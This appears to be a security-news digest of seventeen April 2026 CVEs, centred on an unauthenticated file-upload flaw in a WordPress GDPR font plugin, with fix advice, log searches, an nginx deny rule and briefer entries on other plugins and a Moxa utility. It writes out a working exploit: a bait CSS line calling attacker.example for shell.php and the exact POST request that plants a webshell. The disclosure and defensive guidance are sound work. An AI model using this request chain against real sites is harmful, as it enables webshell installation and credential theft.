April 8-9, 2026 vulnerability digest: GDPR compliance plugin opens WordPress sites to unauthenticated RCE

Seventeen vulnerabilities received CVE identifiers across April 8 and 9, 2026. Sixteen affect WordPress plugins. One affects an industrial utility from Moxa. The most severe entry is CVE-2026-3535, a CVSS 9.8 unauthenticated arbitrary file upload.

The vulnerable plugin is DSGVO Google Web Fonts GDPR. It downloads Google Fonts to the local server and rewrites theme stylesheets to use the local copies. Site owners install it after a 2022 German court ruled that font requests to Google leaked visitor IP addresses in violation of GDPR. Nabil Irawan of Heroes Cyber Security discovered the flaw.

The vulnerable function

The break sits in DSGVOGWPdownloadGoogleFonts() in dsgvo-google-web-fonts-gdpr.php. Wordfence and Managed-WP advisories trace it to lines 46 and 159 of version 1.1. The function is registered through a wp_ajax_nopriv_ hook, which means any unauthenticated visitor can call it through admin-ajax.php.

The intended workflow looks reasonable in isolation. An administrator clicks a button in the plugin settings. The plugin fetches the Google Fonts CSS URL referenced by the active theme. It parses out the actual font file URLs from inside the CSS.

The plugin then downloads those font files to the local server. It generates a new local CSS file in the theme directory and blocks the original calls to Google's font servers.

The break is that none of the assumptions in this workflow are enforced. The function does not verify that the caller is logged in. It does not verify that the supplied URL points to a Google host. It does not verify that the response body is actually CSS.

The function also skips checks on the URLs extracted from the body. It does not verify the MIME type, magic bytes, or extension of the files it downloads before saving them to disk.

An attacker hosts a small file at https://attacker.example/fake.css containing one line.

@font-face { src: url('https://attacker.example/shell.php'); }

The attacker sends a single unauthenticated POST request.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: victim.example
Content-Type: application/x-www-form-urlencoded
 
action=DSGVOGWPdownloadGoogleFonts&fonturl=https://attacker.example/fake.css

The plugin fetches the bait CSS and extracts the URL from inside the response. It downloads shell.php and writes it to a publicly accessible directory inside the active theme. The attacker then loads the saved file via its public URL on the victim site, and the webshell runs under the PHP-FPM or Apache user. From there the path runs through wp-config.php credentials, the user table, persistence, and pivot.

The theme constraint

Exploitation requires the site to use one of six themes. The advisory lists twentyfifteen, twentysixteen, twentyseventeen, storefront, salient, and shapely. The plugin's free version explicitly only supports these themes per its own description on the WordPress.org repository. The constraint relates to how the plugin handles theme-specific font asset paths and is not a security feature.

This narrows the attack surface but does not eliminate it. An attacker scanning at scale fingerprints the active theme through the standard generator meta tag. The same data is available by checking known theme asset paths. Mass exploitation campaigns automate this step routinely.

No patch at the time of writing

The advisory lists all versions up to and including 1.1 as affected with no fixed version. The plugin appears to be unmaintained. Site owners should remove it immediately and switch to OMGF or Local Google Fonts, both of which provide GDPR-compliant local font hosting with active maintenance. OMGF had its own high-severity issue disclosed in early 2024 but ships regular updates.

A correct fix for this vulnerability class requires several controls layered together. Replace wp_ajax_nopriv_ with wp_ajax_ so only authenticated users can call the function. Add a capability check (current_user_can('manage_options')) to restrict the action to administrators. Add a nonce check (check_ajax_referer()) to prevent CSRF.

The plugin should validate the supplied URL's host against an allowlist. Only fonts.googleapis.com and fonts.gstatic.com should be permitted. Downloaded files need MIME type or extension checks against a font-specific list before saving.

Missing file type validation has been the most common class of critical bugs in WordPress plugins for years, and it shows up most often in helper plugins built around a single small task. The DSGVO font case is the structural reason vulnerability digests keep listing more WordPress plugins than everything else combined.

— Artem Safonov, Threat Analyst at AnonHaven

Audit and detection

Search WordPress access logs for requests to admin-ajax.php with the fonturl parameter or the function name.

zgrep -i "fonturl=" /var/log/nginx/*access.log*
zgrep -i "DSGVOGWPdownloadGoogleFonts" /var/log/nginx/*access.log*

Check the active theme's directory for unexpected PHP files. Pay special attention to fonts/ subdirectories. Add a server-level rule preventing PHP execution inside theme asset directories. For Nginx the rule looks like this.

location ~* /wp-content/themes/.*/fonts/.*\.php$ {
    deny all;
}

The Nginx rule is a defense-in-depth control. It breaks the exploit chain even when a malicious file is successfully written. WAF rules should block unauthenticated requests to admin-ajax.php with action=DSGVOGWPdownloadGoogleFonts.

If compromise indicators are found, rotate database credentials immediately. Regenerate WordPress salts in wp-config.php. Rotate any API keys stored in the WordPress database. Restore from a verified clean backup if possible.

A second file upload bug in the same window

CVE-2026-4808 is a CVSS 7.2 arbitrary file upload in the Gerador de Certificados — DevApps plugin, a Brazilian-market certificate generation tool. The bug class is identical to CVE-2026-3535. The lower score reflects more constrained exploitation prerequisites. The underlying mechanism is the same.

Two unrelated developers received CVE identifiers for the same defect class in the same 48-hour window. This is not coordinated. It is the bug class reproducing across the WordPress plugin space reliably enough that two cases per week is statistically normal.

The only non-WordPress entry

CVE-2026-4483 is a CVSS 7.0 exposed IOCTL with insufficient access control in Moxa's MxGeneralIo utility. The utility ships for x86 industrial computers. Moxa published the advisory under reference MPSA-254811.

The flaw allows local privilege escalation through a driver IOCTL interface that does not verify caller privileges. The audience for this entry is operators of Moxa industrial PCs in OT environments, not WordPress administrators. Local privilege escalation through driver IOCTLs is a recurring class in industrial hardware utilities.

Missing authorization in WordPress plugins

Two entries in the digest are missing capability checks on plugin functions. Lower-privileged users can perform actions they should not be able to.

CVE-2026-3480, CVSS 6.5, WP Blockade Visual Page Builder, all versions up to and including 0.9.14.

CVE-2026-3477, CVSS 5.3, PZ Frontend Manager, all versions up to and including 1.0.6.

Both follow the standard pattern of a function exposed without a current_user_can() check.

SQL injection, information disclosure, broken access control, CSRF

CVE-2026-3781, CVSS 5.4, SQL injection in the Attendance Manager plugin through the attmgr_off parameter. SQL injection in WordPress plugins remains less frequent than XSS but is more dangerous in consequence. It can yield access to the user table, password hashes, and site metadata.

CVE-2026-3594, CVSS 5.3, sensitive information disclosure in the Riaxe Product Customizer plugin through an unauthenticated endpoint.

CVE-2026-5167, CVSS 5.3, broken access control in the Masteriyo LMS plugin affecting course content access. Notable because Masteriyo is used in educational institutions and may expose content intended for paid course participants.

CVE-2026-4141, CVSS 4.3, cross-site request forgery in the Quran Translations plugin in all versions up to and including 1.0.

Stored XSS through shortcode and block attributes

Seven stored XSS vulnerabilities sit in the CVSS 4.4–6.4 range. The mechanism is consistent across all of them. The plugin accepts user input through a shortcode or block attribute and renders it on a page without escaping.

CVE-2026-5506, CVSS 6.4, the Wavr plugin through the wave shortcode.

CVE-2026-3618, CVSS 6.4, Columns by BestWebSoft through a shortcode attribute.

CVE-2026-5508, CVSS 6.4, the WowPress plugin through the wowp shortcode.

CVE-2026-3142, CVSS 6.4, the Pinterest Site Verification using Meta Tag plugin.

CVE-2026-4871, CVSS 6.4, the Sports Club Management plugin through a shortcode attribute.

CVE-2026-2838, CVSS 4.4, the Whole Inquiry Cart for WooCommerce plugin.

CVE-2026-5169, CVSS 4.4, the Inquiry Form to Posts or Pages plugin.

Stored XSS through uploaded files

CVE-2025-1794, CVSS 5.4, stored XSS in the AM LottiePlayer plugin through uploaded Lottie animation files. This is the only entry in the digest carrying a 2025 identifier. The CVE number was assigned in 2025, but the description and CVSS score reached the public databases only in this April 8–9 window. The file-upload vector is more interesting than the shortcode XSS cluster, but exploitation still requires an authenticated uploader.

What this digest looks like in pattern

Sixteen of the seventeen vulnerabilities in this digest sit in WordPress plugins, matching a steady multi-year pattern. WordPress holds the largest share of the content management system market. Plugins are written by many different authors with varying security experience. The standard bug classes — missing file type validation, missing authorization, unescaped user input rendered through shortcodes, keep reproducing.

This does not mean WordPress core is insecure. The core team actively maintains the platform and has shipped automatic security updates since 2013. The recurring problem sits in the plugin space. Low developer barriers, no mandatory security review on WordPress.org, and a long tail of widely-installed plugins maintained by individuals keep producing the same bug classes.

A GDPR compliance helper that becomes an unauthenticated RCE primitive is the sharpest version of the WordPress plugin problem. Site owners install these tools to harden their privacy posture and end up with the opposite outcome, which is exactly the dynamic that keeps unmaintained niche plugins dangerous.

— Artem Safonov, Threat Analyst at AnonHaven

All 17 CVEs at a glance

What to do

WordPress administrators should open the installed plugins list and check for any entry from this digest. If the installed version falls in the vulnerable range, update to the patched version. If the developer has not shipped a fix, remove or disable the plugin. The DSGVO Google Web Fonts GDPR plugin requires immediate removal because no patch exists.

OT engineers running Moxa hardware should check the MxGeneralIo utility version. Consult the MPSA-254811 advisory for update guidance.

Everyone else can move on. The remaining 16 medium-severity entries are routine plugin maintenance, concerning for the specific affected sites, not a broad emergency.